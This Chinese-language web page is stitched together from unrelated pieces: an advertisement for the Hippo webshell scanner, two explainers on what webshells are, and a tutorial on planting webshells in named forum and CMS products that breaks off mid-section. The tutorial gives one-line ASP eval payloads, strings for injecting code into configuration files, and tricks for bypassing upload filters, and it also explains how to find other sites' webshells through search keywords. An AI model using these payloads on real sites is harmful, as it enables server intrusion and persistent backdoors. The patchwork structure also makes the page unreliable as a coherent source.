1. 河馬WEBSHELL掃描器1.8.0
新版本河馬WEBSHELL掃描器1.8.0發布,特此贈出4本《互聯網安全建設從0到1》,參與方式請查閱文章末尾。
下載與更新
新用戶訪問shellpub.com,點擊「立即使用」下載適合您的版本。
老用戶更新Linux版本可直接升級。
Windows用戶已接收到升級提醒,未收到者請至官網下載最新版覆蓋安全安裝。
功能更新
新增集成php深度解碼器,此功能在1.6.x版本完成初步開發,現集成於在線查殺,經過多次迭代,新版本正式將此功能下放至本地客戶端。使用深度解碼器時,查殺速度較慢,建議先用常規模式進行快速查殺,再進行精準查殺。全新的查殺引擎2.0開發工作已啟動,敬請期待。
如何使用深度模式
深度解碼模式命令格式如下,示例動圖展示了Linux系統下先用「scan」模式掃描,接著使用「deepscan」進行掃描,Windows用戶可以在掃描按鈕左側勾選深度模式。
BUG修正與兼容性測試
如遇不兼容的發行版本問題,請及時與我們聯系,聯系方式在文章末尾。
常見問題解答
如在使用過程中遇到問題,請在文章下留言或加QQ:1494922137尋求幫助。
活動時間:2020年7月15日至7月29日
參與方式一:關注公眾號「這里是河馬」,轉發本文並在公眾號後台回復截圖,將隨機抽取2名幸運用戶,每人贈書一本。
參與方式二:在活動期間內,向公眾號回復消息(非文章留言),提出建議。選取兩個最優建議的用戶將獲贈書籍,建議范圍包括但不限於河馬查殺系列產品改進建議、河馬查殺嚴重BUG反饋、WEBSHELL混淆、繞過姿勢、河馬查殺明顯的誤報(不含疑似)。
請點擊原文鏈接了解更多詳情。
2. 什麼是php webshell
webshell是web入侵的腳本攻擊工具。簡單的說來,webshell就是一個asp或php木馬後門,黑客在入侵了一個網站後,常常在將這些asp或php木馬後門文件放置在網站伺服器的web目錄中,與正常的網頁文件混在一起。然後黑客就可以用web的方式,通過asp或php木馬後門控制網站伺服器,包括上傳下載文件、查看資料庫、執行任意程序命令等。
為了更好理解webshell我們學習兩個概念:
什麼是「木馬」?「木馬」全稱是「特洛伊木馬(Trojan Horse)」,原指古希臘士兵藏在木馬內進入敵方城市從而佔領敵方城市的故事。在Internet上,「特洛伊木馬」指一些程序設計人員在其可從網路上下載(Download)的應用程序或游戲中,包含了可以控制用戶的計算機系統的程序,可能造成用戶的系統被破壞甚至癱瘓。
什麼是後門?大家都知道,一台計算機上有65535個埠,那麼如果把計算機看作是一間屋子,那麼這65535個埠就可以它看做是計算機為了與外界連接所開的65535扇門。每個門的背後都是一個服務。有的門是主人特地打開迎接客人的(提供服務),有的門是主人為了出去訪問客人而開設的(訪問遠程服務)——理論上,剩下的其他門都該是關閉著的,但偏偏由於各種原因,很多門都是開啟的。於是就有好事者進入,主人的隱私被刺探,生活被打擾,甚至屋裡的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是「後門」。
webshell的優點
webshell 最大的優點就是可以穿越防火牆,由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的,因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄,只會在網站的web日誌中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
如何尋找webshel:
1,腳本攻擊SQL注入
2,使用注入工具
3,在瀏覽器里打開網路,輸入搜索關鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執行一個操作",然後點擊搜索,很快就可以看到檢索到了大量的查詢結果.
3. 自己網站怎麼拿WEBSHELL
一、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文 件url應該是http://forums/images/smiles/下,前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog後台可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站任意可寫目錄中,從而拿到網站的管理員控制許可權。
二、添加修改上傳類型
現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp後台可以添加asa|asP類型,ewebeditor的後台也可添加asa類型,通過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得webshell。php系統的後台,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最後的哪個只要不是已知的文件類型即可,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後台獲得webshell方法是:在上傳類型中增加asp ,注意,asp後面是有個空格的,然後在前台上傳ASP馬,當然也要在後面加個空格!
三、利用後台管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入後台後還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0,還有leadbbs2.88等,直接在後台修改配置文件,寫入後綴是asp的文件。而LeadBbs3.14後台獲得webshell另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字元,http:\\網站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用後台管理向配置文件寫webshell
利用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上cnhacker at 263 dot net":eval request(chr (35))//, 在配製文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",還有一種方法就是寫上cnhacker at 263 dot net"%><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%><%execute request("l")%><%',保存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。
五、利用後台資料庫備份及恢復獲得webshell
主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能,「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改 為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件為其他後綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其資料庫的位置,為資料庫插馬來創造機會,動網論壇就有一個ip地址的資料庫,在後台的ip管理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了後綴名後也會提示文件非法,通過在.asp文件頭加上gif89a修改後綴為gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復制到asp木馬文件頭,修改gif後綴後上傳也可以突破檢測,然後備份為.asp文件,成功得到webshell。
六、利用資料庫壓縮功能
可以將數據的防下載失效從而使插入資料庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交後,在資料庫操作中壓縮資料庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。
七、asp+mssql系統
這里需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片,然後記住其上傳路徑。寫一個本地提交的表單
4. 什麼是 Webshell
webshell,一種web入侵的腳本攻擊工具。
簡單理解,webshell實質上是asp或php木馬後門。黑客在攻佔網站後,常將這些木馬後門文件置於網站伺服器web目錄,與正規網頁文件混雜。然後,黑客能通過web操作,藉助木馬後門對網站伺服器實施控制,包括文件上傳下載、資料庫查看、任意程序命令執行等。
webshell,提供黑客遠程式控制制網站伺服器的便捷方式,通過web界面實現多種操作。這使得黑客無需直接登錄伺服器,僅需通過webshell界面即可操控,極大地便利了攻擊過程,增加了防範難度。
webshell的存在,對於網站安全構成了重大威脅。一旦被黑客植入webshell,網站將可能遭受進一步的破壞和利用。因此,加強網站的安全防護,定期檢查並清理webshell,對於維護網站穩定運行至關重要。
總之,webshell是黑客進行web入侵的重要工具,通過巧妙地在網站伺服器中植入木馬後門,實現對網站的遠程式控制制。防範webshell攻擊,需要網站管理員提高安全意識,實施有效的安全策略,確保網站的安全穩定運行。